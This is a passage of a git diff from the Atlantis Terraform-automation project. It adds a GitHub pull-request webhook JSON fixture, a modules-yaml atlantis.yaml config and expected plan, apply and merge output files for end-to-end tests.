+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "body": "",
+ "created_at": "2018-06-11T16:22:16Z",
+ "updated_at": "2018-06-11T16:22:16Z",
+ "closed_at": null,
+ "merged_at": null,
+ "merge_commit_sha": null,
+ "assignee": null,
+ "assignees": [
+
+ ],
+ "requested_reviewers": [
+
+ ],
+ "requested_teams": [
+
+ ],
+ "labels": [
+
+ ],
+ "milestone": null,
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits",
+ "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments",
+ "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d",
+ "head": {
+ "label": "runatlantis:branch",
+ "ref": "branch",
+ "sha": "c31fd9ea6f557ad2ea659944c3844a059b83bc5d",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "repo": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:09Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 7,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 2,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 2,
+ "watchers": 0,
+ "default_branch": "master"
+ }
+ },
+ "base": {
+ "label": "runatlantis:master",
+ "ref": "master",
+ "sha": "f59a822e83b3cd193142c7624ea635a5d7894388",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "repo": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:09Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 7,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 2,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 2,
+ "watchers": 0,
+ "default_branch": "master"
+ }
+ },
+ "_links": {
+ "self": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2"
+ },
+ "html": {
+ "href": "https://github.com/runatlantis/atlantis-tests/pull/2"
+ },
+ "issue": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2"
+ },
+ "comments": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments"
+ },
+ "review_comments": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments"
+ },
+ "review_comment": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}"
+ },
+ "commits": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits"
+ },
+ "statuses": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d"
+ }
+ },
+ "author_association": "OWNER",
+ "merged": false,
+ "mergeable": null,
+ "rebaseable": null,
+ "mergeable_state": "unknown",
+ "merged_by": null,
+ "comments": 0,
+ "review_comments": 0,
+ "maintainer_can_modify": false,
+ "commits": 5,
+ "additions": 181,
+ "deletions": 8,
+ "changed_files": 23
+ },
+ "repository": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:09Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 7,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 2,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 2,
+ "watchers": 0,
+ "default_branch": "master"
+ },
+ "sender": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ }
+}
\ No newline at end of file
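These two fixtures are verbatim GitHub `pull_request` webhook deliveries for the `closed` and `opened` actions. A minimal sketch of how a test could load one of them into the `go-github` types vendored in Gopkg.lock; the test name and the spot-checked fields are illustrative, not the repo's actual test code:

```go
package server_test

import (
	"encoding/json"
	"io/ioutil"
	"testing"

	"github.com/google/go-github/github"
)

// Hypothetical sanity check: the fixture should unmarshal cleanly into
// go-github's PullRequestEvent and expose the fields the server reads.
func TestOpenedFixtureParses(t *testing.T) {
	raw, err := ioutil.ReadFile("testfixtures/githubPullRequestOpenedEvent.json")
	if err != nil {
		t.Fatal(err)
	}
	var event github.PullRequestEvent
	if err := json.Unmarshal(raw, &event); err != nil {
		t.Fatal(err)
	}
	if event.GetAction() != "opened" {
		t.Fatalf("expected action %q, got %q", "opened", event.GetAction())
	}
	if ref := event.GetPullRequest().GetHead().GetRef(); ref != "branch" {
		t.Fatalf("unexpected head ref %q", ref)
	}
}
```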
diff --git a/server/testfixtures/test-repos/modules-yaml/atlantis.yaml b/server/testfixtures/test-repos/modules-yaml/atlantis.yaml
new file mode 100644
index 0000000000..e5915f3911
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/atlantis.yaml
@@ -0,0 +1,8 @@
+version: 2
+projects:
+- dir: staging
+ autoplan:
+ when_modified: ["**/*.tf", "../modules/null/*"]
+- dir: production
+ autoplan:
+ when_modified: ["**/*.tf", "../modules/null/*"]
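The `when_modified` globs are resolved relative to each project's `dir`, which is how `../modules/null/*` lets a module change trigger plans in both `staging` and `production`. A sketch of that matching, assuming the `github.com/docker/docker/pkg/fileutils` dependency added to Gopkg.lock is what backs it (the exact glob semantics and helper name here are assumptions, not Atlantis's actual implementation):

```go
package main

import (
	"fmt"
	"path/filepath"

	"github.com/docker/docker/pkg/fileutils"
)

// shouldAutoplan reports whether any modified file matches one of the
// project's when_modified globs. Each path is first made relative to the
// project dir so a pattern like "../modules/null/*" can reach outside it.
func shouldAutoplan(projectDir string, whenModified, modifiedFiles []string) (bool, error) {
	for _, f := range modifiedFiles {
		rel, err := filepath.Rel(projectDir, f)
		if err != nil {
			continue // file can't be expressed relative to this project
		}
		match, err := fileutils.Matches(rel, whenModified)
		if err != nil {
			return false, err
		}
		if match {
			return true, nil
		}
	}
	return false, nil
}

func main() {
	match, _ := shouldAutoplan(
		"staging",
		[]string{"**/*.tf", "../modules/null/*"},
		[]string{"modules/null/main.tf"},
	)
	fmt.Println(match) // true: the file is ../modules/null/* relative to staging
}
```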
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt
new file mode 100644
index 0000000000..f0608bcf22
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `production` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = production
+
+```
+
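These golden files mask anything nondeterministic in Terraform's output: apply timings become `*s` and resource IDs become a run of `*`. A hedged sketch of the kind of scrubbing a test could run over real output before diffing it against these files (the regexes are assumptions based on the masking visible above, not Atlantis's actual normalizer):

```go
package main

import (
	"fmt"
	"regexp"
)

// Assumed scrubbers matching the masking visible in the golden files:
// "Creation complete after 1s" -> "after *s", and numeric null_resource
// IDs -> "ID: ******************".
var (
	timingRe = regexp.MustCompile(`after \d+s`)
	idRe     = regexp.MustCompile(`ID: \d+`)
)

func scrub(output string) string {
	output = timingRe.ReplaceAllString(output, "after *s")
	return idRe.ReplaceAllString(output, "ID: ******************")
}

func main() {
	raw := "module.null.null_resource.this: Creation complete after 0s (ID: 1572342473548155963)"
	fmt.Println(scrub(raw))
	// module.null.null_resource.this: Creation complete after *s (ID: ******************)
}
```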
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..ffc7878fe5
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `staging` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = staging
+
+```
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt
new file mode 100644
index 0000000000..295fbdddae
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt
@@ -0,0 +1,51 @@
+Ran Plan for 2 projects:
+1. workspace: `default` dir: `staging`
+1. workspace: `default` dir: `production`
+
+### 1. workspace: `default` dir: `staging`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+### 2. workspace: `default` dir: `production`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt
new file mode 100644
index 0000000000..9712df1ee2
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/production` workspace: `default`
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt
new file mode 100644
index 0000000000..49c8312cd7
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
new file mode 100644
index 0000000000..9c553b9717
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `production` workspace: `default`
+- dir: `staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt
new file mode 100644
